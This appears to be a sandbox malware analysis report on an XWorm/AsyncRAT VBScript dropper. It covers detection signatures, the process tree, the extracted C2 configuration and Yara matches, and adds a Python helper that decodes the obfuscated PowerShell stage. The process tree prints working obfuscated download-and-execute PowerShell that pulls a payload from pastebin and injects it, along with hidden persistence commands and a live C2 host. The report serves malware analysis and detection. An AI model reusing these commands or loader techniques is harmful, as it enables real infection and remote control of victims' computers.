Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name: sostener.vbs
Analysis ID: 1524706
MD5: b18fcb9a2af66c700b70cd9f9a58a563
SHA1: dae167b9d105e0a29dfb43d83540634819c41f0f
SHA256: 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
Tags: asyncrat, vbs, user-lontze7

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5604 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = 
$KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1088 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 3652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • powershell.exe (PID: 2316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6592 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 5368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = 
$KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7208 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegAsm.exe (PID: 7308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Malware Configuration

{"C2 url": ["toskaadmx.duckdns.org"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
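The stage-1 PowerShell wrapper in the process tree (PIDs 1020 and 5368) carries the stage-2 script as UTF-16LE text that was base64-encoded and then had every 'A' of the base64 output swapped for '?'; at run time it swaps the character back, decodes with [Text.Encoding]::Unicode, rewrites the '%pzAcOgInMr%' placeholder to the script's own path and hands the result to a fresh powershell. The Python below is an added analyst helper, not part of the Joe Sandbox report or of the sample: it reverses those steps offline from a captured command line and pulls forward and reversed URLs out of the result. SAMPLE_PREFIX is the first 40 characters of the report's $LoPuennnTes blob and STAGE2_EXCERPT is taken from the PID 6400 command line; the wrap() helper and the short script it encodes are constructed for the demonstration. The parser assumes this wrapper's layout (the first .replace() pair restores the base64 alphabet, later pairs patch the decoded script).

```python
import base64
import re

# First 40 characters of $LoPuennnTes as shown in the report's process tree.
SAMPLE_PREFIX = "J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?"

# Excerpt of the stage-2 command line (PID 6400) from the report.
STAGE2_EXCERPT = (
    "[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient)"
    ".DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );"
    "[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1')"
    ".GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr ))"
)

BLOB_RE = re.compile(r"=\s*'([A-Za-z0-9+/=?]{16,})'")
REPLACE_RE = re.compile(r"\.replace\('([^']*)',\s*'([^']*)'\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
REVERSED_URL_RE = re.compile(r"[^\s'\"()]+//:s?ptth")


def decode_stage1(blob, swap=("?", "A"), post_replacements=None):
    """Undo the wrapper: swap the substituted character back, base64-decode,
    decode UTF-16LE (what [Text.Encoding]::Unicode.GetString does), then apply
    the .replace() calls the wrapper runs on the decoded script."""
    b64 = blob.replace(swap[0], swap[1])
    b64 = b64[: len(b64) - len(b64) % 4]  # drop a trailing partial group if a log cut the blob short
    text = base64.b64decode(b64).decode("utf-16-le", errors="replace")
    for old, new in (post_replacements or {}).items():
        text = text.replace(old, new)
    return text


def unwrap_command(cmdline):
    """Recover the stage-2 script from a captured stage-1 command line."""
    m = BLOB_RE.search(cmdline)
    if not m:
        raise ValueError("no encoded blob found in command line")
    pairs = REPLACE_RE.findall(cmdline)
    # Assumption matching this sample's layout: the first .replace() restores the
    # base64 alphabet, any later .replace() patches the decoded script.
    swap = tuple(pairs[0]) if pairs else ("?", "A")
    return decode_stage1(m.group(1), swap, dict(pairs[1:]))


def extract_urls(text):
    """Forward URLs plus reversed ones (the '//:sptth' trick the Yara hits point at)."""
    found = set(URL_RE.findall(text))
    found.update(tok[::-1] for tok in REVERSED_URL_RE.findall(text))
    return sorted(found)


def wrap(script, placeholder, path, swap=("?", "A")):
    """Constructed helper: rebuild a stage-1 wrapper the way this dropper does,
    so the decoder can be exercised offline on a script with known content."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    blob = b64.replace(swap[1], swap[0])
    return (
        f"powershell.exe -command $LoPuennnTes = '{blob}';"
        "$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String("
        f" $LoPuennnTes.replace('{swap[0]}','{swap[1]}') ) );"
        f"$KByHL = $KByHL.replace('{placeholder}', '{path}');powershell $KByHL;"
    )


if __name__ == "__main__":
    print(decode_stage1(SAMPLE_PREFIX))
    demo = wrap("$v = '%pzAcOgInMr%';Write-Output $v", "%pzAcOgInMr%",
                r"C:\Users\user\Desktop\sostener.vbs")
    print(unwrap_command(demo))
    print(extract_urls(STAGE2_EXCERPT))
```

Run against the full $LoPuennnTes value from the process tree, unwrap_command() yields the stage-2 script shown for PID 6400; the prefix alone already decodes to the start of that script. The partial-group trim matters because sandbox and EDR logs routinely truncate long command lines.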
Source | Rule | Description | Author | Strings
00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x19b33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x2ceeb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x19bd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x2cf88:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x19ce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2d09d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x18c1b:$cnc4: POST / HTTP/1.1
  • 0x2bfd3:$cnc4: POST / HTTP/1.1
00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf3e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf480:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf595:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe4cb:$cnc4: POST / HTTP/1.1
0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
(table truncated: 19 entries in total)

Source | Rule | Description | Author | Strings
4.2.powershell.exe.2877ca20000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
4.2.powershell.exe.2877ca20000.4.raw.unpack | INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL | Detects executables (downloaders) containing reversed URLs to raw contents of a paste | ditekSHen |
  • 0x1a4b:$u1: /moc.nibetsap//:sptth
4.2.powershell.exe.2877ca20000.4.raw.unpack | MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
  • 0x1a65:$h2: //:sptth
  • 0x119c:$s1: DownloadString
  • 0xfe4:$s2: StrReverse
  • 0x118b:$s3: FromBase64String
  • 0x1457:$s4: WebClient
16.2.RegAsm.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
16.2.RegAsm.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf5e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf680:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf795:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe6cb:$cnc4: POST / HTTP/1.1
(table truncated: 24 entries in total)

Source | Rule | Description | Author | Strings
amsi64_6400.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7096.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( 
$LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??Tg
